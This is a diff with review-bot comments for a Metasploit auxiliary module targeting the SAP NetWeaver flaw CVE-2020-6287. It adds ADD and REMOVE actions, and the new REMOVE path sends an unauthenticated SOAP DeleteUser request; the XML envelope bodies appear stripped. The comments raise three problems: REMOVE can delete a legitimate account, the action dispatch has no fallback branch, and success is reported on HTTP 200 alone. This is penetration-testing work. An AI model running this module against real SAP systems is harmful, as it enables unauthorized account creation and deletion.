diff --git a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
index d3986fa7ed..55b551b726 100644
--- a/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb
@@ -31,6 +31,11 @@ class MetasploitModule < Msf::Auxiliary
'Notes' => {
'AKA' => [ 'RECON' ]
},
+ 'Actions' => [
+ [ 'ADD', { 'Description' => 'Add the specified user' } ],
+ [ 'REMOVE', { 'Description' => 'Remove the specified user' } ]
+ ],
+ 'DefaultAction' => 'ADD',
'DisclosureDate' => '2020-07-14'
)
)
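Review bot: The REMOVE description does not say that the account is chosen purely by the USERNAME option. `action_remove`, added later in this commit, sends a delete for `datastore['USERNAME']` without checking that the module created that account, so running REMOVE against a name that already existed would remove a legitimate user. I would state this in the action text, e.g. `[ 'REMOVE', { 'Description' => 'Remove the user named in USERNAME (any account with that name, not only one this module added)' } ]`. The module's 'Description' field lies outside this hunk and probably needs a matching sentence.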
@@ -66,6 +71,15 @@ class MetasploitModule < Msf::Auxiliary
end
def run
+ case action.name
+ when 'ADD'
+ action_add
+ when 'REMOVE'
+ action_remove
+ end
+ end
+
+ def action_add
job = nil
print_status('Starting the PCK Upgrade job...')
job = invoke_pckupgrade
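Review bot: The `case action.name` in `run` has no `else`, so an action added to 'Actions' later without a matching `when` would make the module return silently without doing anything. The framework presumably restricts ACTION to the declared names, so this is defensive, but a closing branch such as `else fail_with(Failure::BadConfig, "Unsupported action: #{action.name}")` turns that silent no-op into a visible error. A one-line comment above `action_add` noting that it is the former `run` body would also help; its body continues outside this hunk.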
@@ -118,6 +132,38 @@ class MetasploitModule < Msf::Auxiliary
end
end
+ def action_remove
+ message = { name: 'DeleteUser' }
+ message[:data] = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+
+ #{datastore['USERNAME'].encode(xml: :text)}
+
+ ENVELOPE
+
+ envelope = Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+
+
+
+
+
+ sap.com/tc~lm~config~content
+ content/Netweaver/ASJava/NWA/SPC/SPC_DeleteUser.cproc
+
+
+ #{Rex::Text.encode_base64(message[:data])}
+ #{message[:name]}
+
+
+
+
+ ENVELOPE
+
+ res = send_request_soap(envelope)
+ fail_with(Failure::UnexpectedReply, 'Failed to delete the user') unless res&.code == 200
+
+ print_good('Successfully deleted the user account')
+ end
+
def report_error_details(job)
print_error('Received a general error notification')
error_event = job.get_event
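Review bot: `action_remove` claims success on HTTP 200 alone, so a 200 response carrying a SOAP fault or an error result would still print 'Successfully deleted the user account'. The response format is not visible in this hunk, but an operator relying on REMOVE for cleanup could then leave the test account behind on the assessed system. Either check the response body before reporting success, or limit the message to what was observed, e.g. `print_good('Delete request accepted (HTTP 200); confirm the account no longer exists')`. The failure path also folds a missing response and a non-200 status into one message; `fail_with(Failure::UnexpectedReply, "Failed to delete the user (HTTP #{res&.code || 'no response'})")` keeps the run log usable. As a style point, both heredocs use the `ENVELOPE` delimiter and the `message` hash holds only two values, so two plain locals with distinct delimiters would read more clearly.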